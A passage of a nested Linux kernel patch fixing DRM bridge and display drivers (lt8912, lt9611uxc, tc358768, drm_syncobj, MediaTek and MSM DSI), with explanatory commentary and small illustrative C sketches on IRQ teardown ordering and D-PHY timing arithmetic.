++		drm_bridge_hpd_enable(lt->hdmi_port, lt8912_bridge_hpd_cb, lt);
++		connector->polled = DRM_CONNECTOR_POLL_HPD;
++	} else {
++		connector->polled = DRM_CONNECTOR_POLL_CONNECT |
++				    DRM_CONNECTOR_POLL_DISCONNECT;
++	}
+ 
+ 	ret = drm_connector_init(bridge->dev, connector,
+ 				 &lt8912_connector_funcs,
+@@ -546,6 +558,13 @@ static int lt8912_bridge_attach(struct drm_bridge *bridge,
+ 	struct lt8912 *lt = bridge_to_lt8912(bridge);
+ 	int ret;
+ 
++	ret = drm_bridge_attach(bridge->encoder, lt->hdmi_port, bridge,
++				DRM_BRIDGE_ATTACH_NO_CONNECTOR);
++	if (ret < 0) {
++		dev_err(lt->dev, "Failed to attach next bridge (%d)\n", ret);
++		return ret;
++	}
++
+ 	if (!(flags & DRM_BRIDGE_ATTACH_NO_CONNECTOR)) {
+ 		ret = lt8912_bridge_connector_init(bridge);
+ 		if (ret) {
+@@ -562,8 +581,6 @@ static int lt8912_bridge_attach(struct drm_bridge *bridge,
+ 	if (ret)
+ 		goto error;
+ 
+-	lt->is_attached = true;
+-
+ 	return 0;
+ 
+ error:
+@@ -575,11 +592,10 @@ static void lt8912_bridge_detach(struct drm_bridge *bridge)
+ {
+ 	struct lt8912 *lt = bridge_to_lt8912(bridge);
+ 
+-	if (lt->is_attached) {
+-		lt8912_hard_power_off(lt);
+-		drm_connector_unregister(&lt->connector);
+-		drm_connector_cleanup(&lt->connector);
+-	}
++	lt8912_hard_power_off(lt);
++
++	if (lt->connector.dev && lt->hdmi_port->ops & DRM_BRIDGE_OP_HPD)
++		drm_bridge_hpd_disable(lt->hdmi_port);
+ }
+ 
+ static enum drm_connector_status
+@@ -734,7 +750,6 @@ static void lt8912_remove(struct i2c_client *client)
+ {
+ 	struct lt8912 *lt = i2c_get_clientdata(client);
+ 
+-	lt8912_bridge_detach(&lt->bridge);
+ 	drm_bridge_remove(&lt->bridge);
+ 	lt8912_free_i2c(lt);
+ 	lt8912_put_dt(lt);
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+index fa1ee6264d921..818848b2c04dd 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+@@ -928,9 +928,9 @@ retry:
+ 	init_waitqueue_head(&lt9611uxc->wq);
+ 	INIT_WORK(&lt9611uxc->work, lt9611uxc_hpd_work);
+ 
+-	ret = devm_request_threaded_irq(dev, client->irq, NULL,
+-					lt9611uxc_irq_thread_handler,
+-					IRQF_ONESHOT, "lt9611uxc", lt9611uxc);
++	ret = request_threaded_irq(client->irq, NULL,
++				   lt9611uxc_irq_thread_handler,
++				   IRQF_ONESHOT, "lt9611uxc", lt9611uxc);
+ 	if (ret) {
+ 		dev_err(dev, "failed to request irq\n");
+ 		goto err_disable_regulators;
+@@ -966,6 +966,8 @@ retry:
+ 	return lt9611uxc_audio_init(dev, lt9611uxc);
+ 
+ err_remove_bridge:
++	free_irq(client->irq, lt9611uxc);
++	cancel_work_sync(&lt9611uxc->work);
+ 	drm_bridge_remove(&lt9611uxc->bridge);
+ 
+ err_disable_regulators:
+@@ -982,7 +984,7 @@ static void lt9611uxc_remove(struct i2c_client *client)
+ {
+ 	struct lt9611uxc *lt9611uxc = i2c_get_clientdata(client);
+ 
+-	disable_irq(client->irq);
++	free_irq(client->irq, lt9611uxc);
+ 	cancel_work_sync(&lt9611uxc->work);
+ 	lt9611uxc_audio_exit(lt9611uxc);
+ 	drm_bridge_remove(&lt9611uxc->bridge);
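
The two lt9611uxc hunks above drop devm management for the interrupt: a devm-requested IRQ is only released after remove() returns, so a late interrupt could still queue hpd work against a bridge that drm_bridge_remove() had already torn down. Requesting with request_threaded_irq() and freeing by hand puts free_irq() strictly before cancel_work_sync() and the rest of the teardown, on the probe error path as well as in remove(). A minimal sketch of that ordering, with hypothetical names throughout (my_dev, my_irq_thread and my_hpd_work are not from the driver):

/*
 * Sketch only: explicit IRQ lifetime so no interrupt can fire and no
 * new work can be queued once teardown has begun. All my_* names are
 * hypothetical.
 */
#include <linux/interrupt.h>
#include <linux/workqueue.h>

struct my_dev {
	int irq;
	struct work_struct work;
};

static void my_hpd_work(struct work_struct *work)
{
	/* ... report hotplug ... */
}

static irqreturn_t my_irq_thread(int irq, void *data)
{
	struct my_dev *md = data;

	schedule_work(&md->work);
	return IRQ_HANDLED;
}

static int my_start(struct my_dev *md, int irq)
{
	int ret;

	INIT_WORK(&md->work, my_hpd_work);

	/* deliberately not devm-managed: we choose when it is freed */
	ret = request_threaded_irq(irq, NULL, my_irq_thread,
				   IRQF_ONESHOT, "my-dev", md);
	if (ret)
		return ret;

	md->irq = irq;
	return 0;
}

static void my_stop(struct my_dev *md)
{
	free_irq(md->irq, md);		/* 1: no new interrupts */
	cancel_work_sync(&md->work);	/* 2: nothing left in flight */
	/* 3: only now tear down the rest of the device */
}
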
+diff --git a/drivers/gpu/drm/bridge/tc358768.c b/drivers/gpu/drm/bridge/tc358768.c
+index 2d0ac9987b58e..8429b6518b502 100644
+--- a/drivers/gpu/drm/bridge/tc358768.c
++++ b/drivers/gpu/drm/bridge/tc358768.c
+@@ -15,6 +15,7 @@
+ #include <linux/regmap.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/slab.h>
++#include <linux/units.h>
+ 
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_crtc_helper.h>
+@@ -217,6 +218,10 @@ static void tc358768_update_bits(struct tc358768_priv *priv, u32 reg, u32 mask,
+ 	u32 tmp, orig;
+ 
+ 	tc358768_read(priv, reg, &orig);
++
++	if (priv->error)
++		return;
++
+ 	tmp = orig & ~mask;
+ 	tmp |= val & mask;
+ 	if (tmp != orig)
+@@ -601,7 +606,7 @@ static int tc358768_setup_pll(struct tc358768_priv *priv,
+ 
+ 	dev_dbg(priv->dev, "PLL: refclk %lu, fbd %u, prd %u, frs %u\n",
+ 		clk_get_rate(priv->refclk), fbd, prd, frs);
+-	dev_dbg(priv->dev, "PLL: pll_clk: %u, DSIClk %u, DSIByteClk %u\n",
++	dev_dbg(priv->dev, "PLL: pll_clk: %u, DSIClk %u, HSByteClk %u\n",
+ 		priv->dsiclk * 2, priv->dsiclk, priv->dsiclk / 4);
+ 	dev_dbg(priv->dev, "PLL: pclk %u (panel: %u)\n",
+ 		tc358768_pll_to_pclk(priv, priv->dsiclk * 2),
+@@ -624,15 +629,14 @@ static int tc358768_setup_pll(struct tc358768_priv *priv,
+ 	return tc358768_clear_error(priv);
+ }
+ 
+-#define TC358768_PRECISION	1000
+-static u32 tc358768_ns_to_cnt(u32 ns, u32 period_nsk)
++static u32 tc358768_ns_to_cnt(u32 ns, u32 period_ps)
+ {
+-	return (ns * TC358768_PRECISION + period_nsk) / period_nsk;
++	return DIV_ROUND_UP(ns * 1000, period_ps);
+ }
+ 
+-static u32 tc358768_to_ns(u32 nsk)
++static u32 tc358768_ps_to_ns(u32 ps)
+ {
+-	return (nsk / TC358768_PRECISION);
++	return ps / 1000;
+ }
+ 
+ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
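
The helper pair above is the pivot of this tc358768 series: the ad-hoc "nsk" fixed point (nanoseconds scaled by TC358768_PRECISION) becomes plain picoseconds, so a clock period is simply PICO / rate and a D-PHY minimum given in nanoseconds turns into DIV_ROUND_UP(ns * 1000, period_ps) clock cycles. The round-up is the point: truncating the division could program a count below the spec minimum. A standalone arithmetic check of the conversion; the 62.5 MHz HS byte clock is only a sample figure:

/* Userspace demo of the ns -> cycle-count conversion used above. */
#include <stdint.h>
#include <stdio.h>

#define PICO 1000000000000ULL	/* ps per second, as in <linux/units.h> */
#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))

static uint32_t ns_to_cnt(uint32_t ns, uint32_t period_ps)
{
	return DIV_ROUND_UP((uint64_t)ns * 1000, period_ps);
}

int main(void)
{
	uint32_t hsbyteclk = 62500000;		/* 62.5 MHz, example only */
	uint32_t period_ps = PICO / hsbyteclk;	/* 16000 ps */

	/* LP11 > 100 us for D-PHY Rx init, as in the LINEINITCNT hunk */
	printf("period %u ps, LINEINITCNT %u\n",
	       period_ps, ns_to_cnt(100 * 1000, period_ps) - 1);
	return 0;
}
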
+@@ -643,13 +647,15 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	u32 val, val2, lptxcnt, hact, data_type;
+ 	s32 raw_val;
+ 	const struct drm_display_mode *mode;
+-	u32 dsibclk_nsk, dsiclk_nsk, ui_nsk, phy_delay_nsk;
+-	u32 dsiclk, dsibclk, video_start;
++	u32 hsbyteclk_ps, dsiclk_ps, ui_ps;
++	u32 dsiclk, hsbyteclk, video_start;
+ 	const u32 internal_delay = 40;
+ 	int ret, i;
++	struct videomode vm;
++	struct device *dev = priv->dev;
+ 
+ 	if (mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS) {
+-		dev_warn_once(priv->dev, "Non-continuous mode unimplemented, falling back to continuous\n");
++		dev_warn_once(dev, "Non-continuous mode unimplemented, falling back to continuous\n");
+ 		mode_flags &= ~MIPI_DSI_CLOCK_NON_CONTINUOUS;
+ 	}
+ 
+@@ -657,7 +663,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	ret = tc358768_sw_reset(priv);
+ 	if (ret) {
+-		dev_err(priv->dev, "Software reset failed: %d\n", ret);
++		dev_err(dev, "Software reset failed: %d\n", ret);
+ 		tc358768_hw_disable(priv);
+ 		return;
+ 	}
+@@ -665,45 +671,47 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	mode = &bridge->encoder->crtc->state->adjusted_mode;
+ 	ret = tc358768_setup_pll(priv, mode);
+ 	if (ret) {
+-		dev_err(priv->dev, "PLL setup failed: %d\n", ret);
++		dev_err(dev, "PLL setup failed: %d\n", ret);
+ 		tc358768_hw_disable(priv);
+ 		return;
+ 	}
+ 
++	drm_display_mode_to_videomode(mode, &vm);
++
+ 	dsiclk = priv->dsiclk;
+-	dsibclk = dsiclk / 4;
++	hsbyteclk = dsiclk / 4;
+ 
+ 	/* Data Format Control Register */
+ 	val = BIT(2) | BIT(1) | BIT(0); /* rdswap_en | dsitx_en | txdt_en */
+ 	switch (dsi_dev->format) {
+ 	case MIPI_DSI_FMT_RGB888:
+ 		val |= (0x3 << 4);
+-		hact = mode->hdisplay * 3;
+-		video_start = (mode->htotal - mode->hsync_start) * 3;
++		hact = vm.hactive * 3;
++		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_24;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+ 		val |= (0x4 << 4);
+-		hact = mode->hdisplay * 3;
+-		video_start = (mode->htotal - mode->hsync_start) * 3;
++		hact = vm.hactive * 3;
++		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+ 		val |= (0x4 << 4) | BIT(3);
+-		hact = mode->hdisplay * 18 / 8;
+-		video_start = (mode->htotal - mode->hsync_start) * 18 / 8;
++		hact = vm.hactive * 18 / 8;
++		video_start = (vm.hsync_len + vm.hback_porch) * 18 / 8;
+ 		data_type = MIPI_DSI_PIXEL_STREAM_3BYTE_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB565:
+ 		val |= (0x5 << 4);
+-		hact = mode->hdisplay * 2;
+-		video_start = (mode->htotal - mode->hsync_start) * 2;
++		hact = vm.hactive * 2;
++		video_start = (vm.hsync_len + vm.hback_porch) * 2;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_16;
+ 		break;
+ 	default:
+-		dev_err(priv->dev, "Invalid data format (%u)\n",
++		dev_err(dev, "Invalid data format (%u)\n",
+ 			dsi_dev->format);
+ 		tc358768_hw_disable(priv);
+ 		return;
+@@ -723,69 +731,67 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		tc358768_write(priv, TC358768_D0W_CNTRL + i * 4, 0x0000);
+ 
+ 	/* DSI Timings */
+-	dsibclk_nsk = (u32)div_u64((u64)1000000000 * TC358768_PRECISION,
+-				  dsibclk);
+-	dsiclk_nsk = (u32)div_u64((u64)1000000000 * TC358768_PRECISION, dsiclk);
+-	ui_nsk = dsiclk_nsk / 2;
+-	phy_delay_nsk = dsibclk_nsk + 2 * dsiclk_nsk;
+-	dev_dbg(priv->dev, "dsiclk_nsk: %u\n", dsiclk_nsk);
+-	dev_dbg(priv->dev, "ui_nsk: %u\n", ui_nsk);
+-	dev_dbg(priv->dev, "dsibclk_nsk: %u\n", dsibclk_nsk);
+-	dev_dbg(priv->dev, "phy_delay_nsk: %u\n", phy_delay_nsk);
++	hsbyteclk_ps = (u32)div_u64(PICO, hsbyteclk);
++	dsiclk_ps = (u32)div_u64(PICO, dsiclk);
++	ui_ps = dsiclk_ps / 2;
++	dev_dbg(dev, "dsiclk: %u ps, ui %u ps, hsbyteclk %u ps\n", dsiclk_ps,
++		ui_ps, hsbyteclk_ps);
+ 
+ 	/* LP11 > 100us for D-PHY Rx Init */
+-	val = tc358768_ns_to_cnt(100 * 1000, dsibclk_nsk) - 1;
+-	dev_dbg(priv->dev, "LINEINITCNT: 0x%x\n", val);
++	val = tc358768_ns_to_cnt(100 * 1000, hsbyteclk_ps) - 1;
++	dev_dbg(dev, "LINEINITCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_LINEINITCNT, val);
+ 
+ 	/* LPTimeCnt > 50ns */
+-	val = tc358768_ns_to_cnt(50, dsibclk_nsk) - 1;
++	val = tc358768_ns_to_cnt(50, hsbyteclk_ps) - 1;
+ 	lptxcnt = val;
+-	dev_dbg(priv->dev, "LPTXTIMECNT: 0x%x\n", val);
++	dev_dbg(dev, "LPTXTIMECNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_LPTXTIMECNT, val);
+ 
+ 	/* 38ns < TCLK_PREPARE < 95ns */
+-	val = tc358768_ns_to_cnt(65, dsibclk_nsk) - 1;
++	val = tc358768_ns_to_cnt(65, hsbyteclk_ps) - 1;
++	dev_dbg(dev, "TCLK_PREPARECNT %u\n", val);
+ 	/* TCLK_PREPARE + TCLK_ZERO > 300ns */
+-	val2 = tc358768_ns_to_cnt(300 - tc358768_to_ns(2 * ui_nsk),
+-				  dsibclk_nsk) - 2;
++	val2 = tc358768_ns_to_cnt(300 - tc358768_ps_to_ns(2 * ui_ps),
++				  hsbyteclk_ps) - 2;
++	dev_dbg(dev, "TCLK_ZEROCNT %u\n", val2);
+ 	val |= val2 << 8;
+-	dev_dbg(priv->dev, "TCLK_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_HEADERCNT, val);
+ 
+ 	/* TCLK_TRAIL > 60ns AND TEOT <= 105 ns + 12*UI */
+-	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(2 * ui_nsk), dsibclk_nsk) - 5;
++	raw_val = tc358768_ns_to_cnt(60 + tc358768_ps_to_ns(2 * ui_ps), hsbyteclk_ps) - 5;
+ 	val = clamp(raw_val, 0, 127);
+-	dev_dbg(priv->dev, "TCLK_TRAILCNT: 0x%x\n", val);
++	dev_dbg(dev, "TCLK_TRAILCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_TRAILCNT, val);
+ 
+ 	/* 40ns + 4*UI < THS_PREPARE < 85ns + 6*UI */
+-	val = 50 + tc358768_to_ns(4 * ui_nsk);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) - 1;
++	val = 50 + tc358768_ps_to_ns(4 * ui_ps);
++	val = tc358768_ns_to_cnt(val, hsbyteclk_ps) - 1;
++	dev_dbg(dev, "THS_PREPARECNT %u\n", val);
+ 	/* THS_PREPARE + THS_ZERO > 145ns + 10*UI */
+-	raw_val = tc358768_ns_to_cnt(145 - tc358768_to_ns(3 * ui_nsk), dsibclk_nsk) - 10;
++	raw_val = tc358768_ns_to_cnt(145 - tc358768_ps_to_ns(3 * ui_ps), hsbyteclk_ps) - 10;
+ 	val2 = clamp(raw_val, 0, 127);
++	dev_dbg(dev, "THS_ZEROCNT %u\n", val2);
+ 	val |= val2 << 8;
+-	dev_dbg(priv->dev, "THS_HEADERCNT: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_THS_HEADERCNT, val);
+ 
+ 	/* TWAKEUP > 1ms in lptxcnt steps */
+-	val = tc358768_ns_to_cnt(1020000, dsibclk_nsk);
++	val = tc358768_ns_to_cnt(1020000, hsbyteclk_ps);
+ 	val = val / (lptxcnt + 1) - 1;
+-	dev_dbg(priv->dev, "TWAKEUP: 0x%x\n", val);
++	dev_dbg(dev, "TWAKEUP: %u\n", val);
+ 	tc358768_write(priv, TC358768_TWAKEUP, val);
+ 
+ 	/* TCLK_POSTCNT > 60ns + 52*UI */
+-	val = tc358768_ns_to_cnt(60 + tc358768_to_ns(52 * ui_nsk),
+-				 dsibclk_nsk) - 3;
+-	dev_dbg(priv->dev, "TCLK_POSTCNT: 0x%x\n", val);
++	val = tc358768_ns_to_cnt(60 + tc358768_ps_to_ns(52 * ui_ps),
++				 hsbyteclk_ps) - 3;
++	dev_dbg(dev, "TCLK_POSTCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_TCLK_POSTCNT, val);
+ 
+ 	/* max(60ns + 4*UI, 8*UI) < THS_TRAILCNT < 105ns + 12*UI */
+-	raw_val = tc358768_ns_to_cnt(60 + tc358768_to_ns(18 * ui_nsk),
+-				     dsibclk_nsk) - 4;
++	raw_val = tc358768_ns_to_cnt(60 + tc358768_ps_to_ns(18 * ui_ps),
++				     hsbyteclk_ps) - 4;
+ 	val = clamp(raw_val, 0, 15);
+-	dev_dbg(priv->dev, "THS_TRAILCNT: 0x%x\n", val);
++	dev_dbg(dev, "THS_TRAILCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_THS_TRAILCNT, val);
+ 
+ 	val = BIT(0);
+@@ -793,16 +799,17 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		val |= BIT(i + 1);
+ 	tc358768_write(priv, TC358768_HSTXVREGEN, val);
+ 
+-	if (!(mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS))
+-		tc358768_write(priv, TC358768_TXOPTIONCNTRL, 0x1);
++	tc358768_write(priv, TC358768_TXOPTIONCNTRL,
++		       (mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS) ? 0 : BIT(0));
+ 
+ 	/* TXTAGOCNT[26:16] RXTASURECNT[10:0] */
+-	val = tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk * 4);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) / 4 - 1;
+-	val2 = tc358768_ns_to_cnt(tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk),
+-				  dsibclk_nsk) - 2;
++	val = tc358768_ps_to_ns((lptxcnt + 1) * hsbyteclk_ps * 4);
++	val = tc358768_ns_to_cnt(val, hsbyteclk_ps) / 4 - 1;
++	dev_dbg(dev, "TXTAGOCNT: %u\n", val);
++	val2 = tc358768_ns_to_cnt(tc358768_ps_to_ns((lptxcnt + 1) * hsbyteclk_ps),
++				  hsbyteclk_ps) - 2;
++	dev_dbg(dev, "RXTASURECNT: %u\n", val2);
+ 	val = val << 16 | val2;
+-	dev_dbg(priv->dev, "BTACNTRL1: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_BTACNTRL1, val);
+ 
+ 	/* START[0] */
+@@ -813,43 +820,43 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		tc358768_write(priv, TC358768_DSI_EVENT, 0);
+ 
+ 		/* vact */
+-		tc358768_write(priv, TC358768_DSI_VACT, mode->vdisplay);
++		tc358768_write(priv, TC358768_DSI_VACT, vm.vactive);
+ 
+ 		/* vsw */
+-		tc358768_write(priv, TC358768_DSI_VSW,
+-			       mode->vsync_end - mode->vsync_start);
++		tc358768_write(priv, TC358768_DSI_VSW, vm.vsync_len);
++
+ 		/* vbp */
+-		tc358768_write(priv, TC358768_DSI_VBPR,
+-			       mode->vtotal - mode->vsync_end);
++		tc358768_write(priv, TC358768_DSI_VBPR, vm.vback_porch);
+ 
+ 		/* hsw * byteclk * ndl / pclk */
+-		val = (u32)div_u64((mode->hsync_end - mode->hsync_start) *
+-				   ((u64)priv->dsiclk / 4) * priv->dsi_lanes,
+-				   mode->clock * 1000);
++		val = (u32)div_u64(vm.hsync_len *
++				   (u64)hsbyteclk * priv->dsi_lanes,
++				   vm.pixelclock);
+ 		tc358768_write(priv, TC358768_DSI_HSW, val);
+ 
+ 		/* hbp * byteclk * ndl / pclk */
+-		val = (u32)div_u64((mode->htotal - mode->hsync_end) *
+-				   ((u64)priv->dsiclk / 4) * priv->dsi_lanes,
+-				   mode->clock * 1000);
++		val = (u32)div_u64(vm.hback_porch *
++				   (u64)hsbyteclk * priv->dsi_lanes,
++				   vm.pixelclock);
+ 		tc358768_write(priv, TC358768_DSI_HBPR, val);
+ 	} else {
+ 		/* Set event mode */
+ 		tc358768_write(priv, TC358768_DSI_EVENT, 1);
+ 
+ 		/* vact */
+-		tc358768_write(priv, TC358768_DSI_VACT, mode->vdisplay);
++		tc358768_write(priv, TC358768_DSI_VACT, vm.vactive);
+ 
+ 		/* vsw (+ vbp) */
+ 		tc358768_write(priv, TC358768_DSI_VSW,
+-			       mode->vtotal - mode->vsync_start);
++			       vm.vsync_len + vm.vback_porch);
++
+ 		/* vbp (not used in event mode) */
+ 		tc358768_write(priv, TC358768_DSI_VBPR, 0);
+ 
+ 		/* (hsw + hbp) * byteclk * ndl / pclk */
+-		val = (u32)div_u64((mode->htotal - mode->hsync_start) *
+-				   ((u64)priv->dsiclk / 4) * priv->dsi_lanes,
+-				   mode->clock * 1000);
++		val = (u32)div_u64((vm.hsync_len + vm.hback_porch) *
++				   (u64)hsbyteclk * priv->dsi_lanes,
++				   vm.pixelclock);
+ 		tc358768_write(priv, TC358768_DSI_HSW, val);
+ 
+ 		/* hbp (not used in event mode) */
+@@ -860,11 +867,12 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	tc358768_write(priv, TC358768_DSI_HACT, hact);
+ 
+ 	/* VSYNC polarity */
+-	if (!(mode->flags & DRM_MODE_FLAG_NVSYNC))
+-		tc358768_update_bits(priv, TC358768_CONFCTL, BIT(5), BIT(5));
++	tc358768_update_bits(priv, TC358768_CONFCTL, BIT(5),
++			     (mode->flags & DRM_MODE_FLAG_PVSYNC) ? BIT(5) : 0);
++
+ 	/* HSYNC polarity */
+-	if (mode->flags & DRM_MODE_FLAG_PHSYNC)
+-		tc358768_update_bits(priv, TC358768_PP_MISC, BIT(0), BIT(0));
++	tc358768_update_bits(priv, TC358768_PP_MISC, BIT(0),
++			     (mode->flags & DRM_MODE_FLAG_PHSYNC) ? BIT(0) : 0);
+ 
+ 	/* Start DSI Tx */
+ 	tc358768_write(priv, TC358768_DSI_START, 0x1);
+@@ -894,7 +902,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	ret = tc358768_clear_error(priv);
+ 	if (ret) {
+-		dev_err(priv->dev, "Bridge pre_enable failed: %d\n", ret);
++		dev_err(dev, "Bridge pre_enable failed: %d\n", ret);
+ 		tc358768_bridge_disable(bridge);
+ 		tc358768_bridge_post_disable(bridge);
+ 	}
+diff --git a/drivers/gpu/drm/drm_syncobj.c b/drivers/gpu/drm/drm_syncobj.c
+index e592c5da70cee..da0145bc104a8 100644
+--- a/drivers/gpu/drm/drm_syncobj.c
++++ b/drivers/gpu/drm/drm_syncobj.c
+@@ -1015,7 +1015,8 @@ static signed long drm_syncobj_array_wait_timeout(struct drm_syncobj **syncobjs,
+ 		fence = drm_syncobj_fence_get(syncobjs[i]);
+ 		if (!fence || dma_fence_chain_find_seqno(&fence, points[i])) {
+ 			dma_fence_put(fence);
+-			if (flags & DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT) {
++			if (flags & (DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT |
++				     DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE)) {
+ 				continue;
+ 			} else {
+ 				timeout = -EINVAL;
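
This one-line widening lets DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE take the same keep-waiting branch as WAIT_FOR_SUBMIT when a timeline point has no fence yet; previously a WAIT_AVAILABLE-only wait on a point that had not materialized returned -EINVAL instead of blocking. Roughly how the flag is used from userspace, as a hedged sketch of the uapi (fd, handle and point are placeholders):

/*
 * Hedged sketch: block until a timeline point has a fence *available*
 * (submitted), not necessarily signaled. Header path per libdrm setup.
 */
#include <stdint.h>
#include <sys/ioctl.h>
#include <drm/drm.h>

static int wait_point_available(int fd, uint32_t handle, uint64_t point,
				int64_t timeout_nsec)
{
	struct drm_syncobj_timeline_wait wait = {
		.handles = (uintptr_t)&handle,
		.points = (uintptr_t)&point,
		.timeout_nsec = timeout_nsec,
		.count_handles = 1,
		.flags = DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE,
	};

	return ioctl(fd, DRM_IOCTL_SYNCOBJ_TIMELINE_WAIT, &wait);
}
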
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 14ddfe3a6be77..7fb52a573436e 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -402,6 +402,9 @@ static int mtk_crtc_ddp_hw_init(struct mtk_drm_crtc *mtk_crtc)
+ 		unsigned int local_layer;
+ 
+ 		plane_state = to_mtk_plane_state(plane->state);
++
++		/* layers should not be enabled before the CRTC is enabled */
++		plane_state->pending.enable = false;
+ 		comp = mtk_drm_ddp_comp_for_plane(crtc, plane, &local_layer);
+ 		if (comp)
+ 			mtk_ddp_comp_layer_config(comp, local_layer,
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_plane.c b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+index 2f5e007dd3800..c4a0203d17e38 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_plane.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+@@ -157,9 +157,9 @@ static void mtk_plane_atomic_async_update(struct drm_plane *plane,
+ 	plane->state->src_y = new_state->src_y;
+ 	plane->state->src_h = new_state->src_h;
+ 	plane->state->src_w = new_state->src_w;
+-	swap(plane->state->fb, new_state->fb);
+ 
+ 	mtk_plane_update_new_state(new_state, new_plane_state);
++	swap(plane->state->fb, new_state->fb);
+ 	wmb(); /* Make sure the above parameters are set before update */
+ 	new_plane_state->pending.async_dirty = true;
+ 	mtk_drm_crtc_async_update(new_state->crtc, plane, state);
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 9e1363c9fcdb4..3e74c7c1b89fa 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -406,7 +406,7 @@ static void mtk_dsi_rxtx_control(struct mtk_dsi *dsi)
+ 	if (dsi->mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS)
+ 		tmp_reg |= HSTX_CKLP_EN;
+ 
+-	if (!(dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET))
++	if (dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET)
+ 		tmp_reg |= DIS_EOT;
+ 
+ 	writel(tmp_reg, dsi->regs + DSI_TXRX_CTRL);
+@@ -483,7 +483,7 @@ static void mtk_dsi_config_vdo_timing(struct mtk_dsi *dsi)
+ 			  timing->da_hs_zero + timing->da_hs_exit + 3;
+ 
+ 	delta = dsi->mode_flags & MIPI_DSI_MODE_VIDEO_BURST ? 18 : 12;
+-	delta += dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET ? 2 : 0;
++	delta += dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET ? 0 : 2;
+ 
+ 	horizontal_frontporch_byte = vm->hfront_porch * dsi_tmp_buf_bpp;
+ 	horizontal_front_back_byte = horizontal_frontporch_byte + horizontal_backporch_byte;
+diff --git a/drivers/gpu/drm/msm/dsi/dsi.c b/drivers/gpu/drm/msm/dsi/dsi.c
+index 8a95c744972a1..e9036e4036bc6 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi.c
++++ b/drivers/gpu/drm/msm/dsi/dsi.c
+@@ -127,6 +127,7 @@ static void dsi_unbind(struct device *dev, struct device *master,
+ 	struct msm_drm_private *priv = dev_get_drvdata(master);
+ 	struct msm_dsi *msm_dsi = dev_get_drvdata(dev);
+ 
++	msm_dsi_tx_buf_free(msm_dsi->host);
+ 	priv->dsi[msm_dsi->id] = NULL;
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/dsi/dsi.h b/drivers/gpu/drm/msm/dsi/dsi.h
+index 2a96b4fe7839f..6b239f77fca94 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi.h
++++ b/drivers/gpu/drm/msm/dsi/dsi.h
+@@ -123,6 +123,7 @@ int dsi_tx_buf_alloc_v2(struct msm_dsi_host *msm_host, int size);
+ void *dsi_tx_buf_get_6g(struct msm_dsi_host *msm_host);
+ void *dsi_tx_buf_get_v2(struct msm_dsi_host *msm_host);
+ void dsi_tx_buf_put_6g(struct msm_dsi_host *msm_host);
